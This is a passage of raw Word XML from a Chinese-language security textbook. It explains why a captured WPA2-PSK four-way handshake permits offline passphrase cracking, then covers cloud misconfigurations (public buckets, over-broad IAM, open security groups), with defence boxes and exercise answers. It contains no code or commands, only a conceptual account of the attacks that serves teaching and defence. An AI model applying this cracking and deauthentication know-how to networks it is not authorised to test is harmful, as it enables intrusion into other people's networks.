        <w:t xml:space="preserve">Key），但它们不能直接喊出这个口令来互相确认，因为周围的人都在听。于是它们设计了一套方案，各自生成随机数，然后交换包含这些随机数和口令运算结果的信息，最终各自用相同的方式派生出一把临时会话钥匙。如果某一方的运算结果与另一方不匹配，握手就会失败。而攻击者的目标，就是窃听这场对话，然后回家用穷举的方式去试这个公共口令，直到找到那个能推导出与现场抓到的数据完全一致的结果的口令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体机理：WPA2-PSK中的PSK通过SSID和用户设置的通行短语经PBKDF2（Password-Based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Key Derivation Function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2）派生为PMK（Pairwise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Master </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Key，成对主密钥）。四次握手发生于802.11开放系统认证和关联之后，其交互过程如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant STA as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Supplicant)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant AP as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接入点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Authenticator)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over AP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ANonce</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP-&gt;&gt;STA: Message 1: ANonce</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over STA: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SNonce&lt;br&gt;计算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> PTK = PRF(PMK, ANonce, SNonce, AP_MAC, STA_MAC)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> STA-&gt;&gt;AP: Message 2: SNonce + MIC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over AP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">同样计算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PTK&lt;br&gt;验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MIC (Message Integrity Code)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP-&gt;&gt;STA: Message 3: GTK + MIC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> PTK)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> STA-&gt;&gt;AP: Message 4: ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> PTK)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PMK始终保存在两端，并不在帧中传输。ANonce和SNonce以明文发送，AP和STA的MAC地址也在帧头中暴露。PTK由PRF（Pseudo-Random</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Function，伪随机函数）基于PMK、ANonce、SNonce以及AP与STA的MAC地址计算得出。PTK中包含了用于加密单播数据帧的密钥以及用于生成消息完整性校验码MIC的密钥。攻击者只需捕获完整的四次握手包（至少包含ANonce、SNonce、两个MAC地址和相应的MIC），即可离线地尝试不同的PSK：对每个候选PSK计算PMK，进而计算PTK，并用PTK的MIC密钥对握手消息2中的内容重新计算MIC，若与捕获的MIC相同，则口令猜测成功。这就是为什么WPA2-PSK握手可以被离线破解——所有构造PTK所需的输入（除PMK外）均明文传输或在帧头中可见，而PMK仅由通行短语唯一确定。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此攻击的假设被违反之处在于：有线网络通信介质受物理隔离保护，窃听攻击的门槛极高；而无线信号以广播形式扩散，802.11管理帧与握手帧的先天透明性使得被动窃听成为可能。此外，PSK机制的强度完全依赖于用户口令的熵值，这违反了“密码学安全不应依赖于秘密的复杂度”这一理想假设。在现实中，弱口令是WPA2-PSK最致命的短板。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（无线安全）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">强口令策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用长度不少于12字符、包含大小写字母、数字及符号的随机通行短语，使离线暴力破解不可行。这是最直接且无需硬件升级的缓解措施。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">升级至WPA3-SAE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：WPA3使用对等实体同时认证（SAE，Simultaneous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Authentication of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Equals），基于蜻蜓握手（dragonfly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">handshake），利用离散对数密码学阻止离线字典攻击——每次猜测需要与在线目标交互，且猜中的认证值不泄露验证材料。这是从协议层面根除离线破解的根本方法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">企业级认证（802.1X/EAP）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用RADIUS服务器进行每用户每会话的独立凭据验证，避免共享PSK的单点失效问题。企业网络应强制采用WPA2/WPA3-Enterprise。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络监控与入侵检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在无线环境中部署WIDS（Wireless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intrusion Detection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">System），监测异常的解除认证（Deauthentication）帧洪水——攻击者常先发送Deauth帧迫使合法客户端断开重连以捕获四次握手。第19章中Snort/Suricata规则可扩展至无线帧分析，但需兼容特定无线分析工具（如Kismet）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">云安全概览：责任共担模型与典型错配</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">云计算将计算、存储、网络等资源抽象为按需服务，其安全职责不再是客户单方的全栈管理，而是由云服务商（CSP，Cloud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider）与客户根据服务模式共同承担，这就是责任共担模型（Shared</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Responsibility </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Model）。理解这一边界是云安全认知的起点，因为多数云安全事故源于客户认为自己无需负责而放任的错误配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角：传统的网络边界在云中变得模糊。攻击者不再需要通过渗透企业内网再横向移动，而是可以直接扫描暴露在公网的云存储服务、管理接口或过度授权的API端点。密码喷洒（password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">spraying）、公开存储桶枚举、IAM权限滥用成为云环境中的高频攻击向量。防御者视角：必须意识到“虚拟化不等于安全”。IaaS（Infrastructure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service）模式下，CSP负责物理设施、计算虚拟化层和网络基础设施的安全，客户负责从操作系统向上的一切，包括应用、数据、身份认证、网络配置（安全组/防火墙规则）。PaaS（Platform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service）模式下，CSP进一步接管运行环境和中间件，客户主要聚焦应用代码与数据。SaaS（Software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service）模式下，CSP几乎负责所有底层安全，客户仅承担数据和访问控制的职责。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">云安全的第一个常见错配是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">公开存储桶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对象存储服务（如Amazon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> S3、Azure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Blob）默认可由客户配置为私有，但企业出于方便共享或配置疏忽，将存储桶设置为“公共可读”甚至“公共可写”。攻击者通过抓取域名证书透明日志、搜索引擎缓存或API枚举发现此类公开存储桶，便可能直接读取敏感文件，如备份数据库、日志、凭证文件。某些自动化扫描工具在GitHub上不断抓取泄露的云凭证，一旦获得具有读取权限的AK/SK（Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Key/Secret </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Key），即可枚举所有桶。公开存储桶违反了“数据应仅对授权实体可访问”的机密性假设，将访问控制完全交由可能失手的配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第二个典型错配是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">过于宽泛的IAM权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。云平台通过IAM（Identity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Management）策略赋予用户、组、角色对资源的操作权限。为图省事，客户常直接授予</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AdministratorAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限，违反最小权限原则。且云环境中有大量非人类身份（服务账户、Lambda执行角色等），其凭据若暴露在代码仓库或环境变量中，便等同于向攻击者交出极高的权限。此外，还有安全组规则对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开放敏感端口（如22、3389、数据库端口），等同于将主机直接暴露在公网，拒绝服务、暴力破解、漏洞利用随之而来。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（云安全）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">强制最小IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：为每种工作任务创建独立的角色，仅授予完成其工作所必须的权限。定期使用IAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyzer审查资源策略，删除过度授权的星号通配符。为人类用户启用多因素认证（MFA）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">默认私有与配置审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将所有存储桶和数据库实例配置为默认私有，需要对外共享时，使用时间限制的预签名URL或访问控制列表（ACL），而非直接设为全球可读。启用云原生配置审计服务（如AWS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Config、Azure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Policy）持续检测公开暴露的资源。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络安全加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：安全组采用白名单模型，仅放行必要的来源IP及端口；管理端口（SSH/RDP）仅允许堡垒主机IP或VPN网段。使用云防火墙（如AWS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF、CloudFront）过滤Web攻击，结合VPC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Logs和云原生监控服务实现第19章的SIEM关联分析。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">密钥管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：严禁将云凭据硬编码到源代码或配置文件中，使用密钥管理服务（如AWS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets Manager、Azure Key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Vault）动态检索凭证，并对所有服务账户密钥启用定期轮换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么WPA2四次握手可以被离线破解，而WPA3-SAE则无法被同样方式攻击？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">考虑两种协议中，对PSK的验证过程是否需要在线交互，以及攻击者是否能从捕获的帧中提取出可用于离线验证的充分材料。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA2四次握手中，ANonce、SNonce、双方MAC地址均以明文传输，PTK的派生只依赖于这些公开参数与未知的PSK。攻击者捕获握手包后，可用函数</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:nor/>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>PTK</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:nor/>
            <m:sty m:val="p"/>
          </m:rPr>
          <m:t>PRF</m:t>
        </m:r>
        <m:d>
          <m:dPr>
            <m:begChr m:val="("/>
            <m:sepChr m:val=""/>
            <m:endChr m:val=")"/>
            <m:grow/>
          </m:dPr>
          <m:e>
            <m:r>
              <m:rPr>
                <m:nor/>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>PMK</m:t>
            </m:r>
            <m:d>
              <m:dPr>
                <m:begChr m:val="("/>
                <m:sepChr m:val=""/>
                <m:endChr m:val=")"/>
                <m:grow/>
              </m:dPr>
              <m:e>
                <m:r>
                  <m:rPr>
                    <m:nor/>
                    <m:sty m:val="p"/>
                  </m:rPr>
                  <m:t>PSK</m:t>
                </m:r>
              </m:e>
            </m:d>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>,</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:nor/>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>ANonce</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>,</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:nor/>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>SNonce</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>,</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:nor/>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>AP_MAC</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>,</m:t>
            </m:r>
            <m:r>
              <m:rPr>
                <m:nor/>
                <m:sty m:val="p"/>
              </m:rPr>
              <m:t>STA_MAC</m:t>
            </m:r>
          </m:e>
        </m:d>
      </m:oMath>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行本地反复计算，并将计算出的PTK中MIC密钥部分生成的MIC与捕获的MIC比对，因此完全可离线。而WPA3-SAE使用蜻蜓握手，基于离散对数难题的认证元素（PWE）派生，每次口令猜测都需与AP或STA进行在线交互，且从通信中无法提取出可验证口令正确性的永久值，因此离线字典攻击不可行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">云服务中的责任共担模型是什么意思？请以IaaS为例说明客户和云服务商各自的安全责任边界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
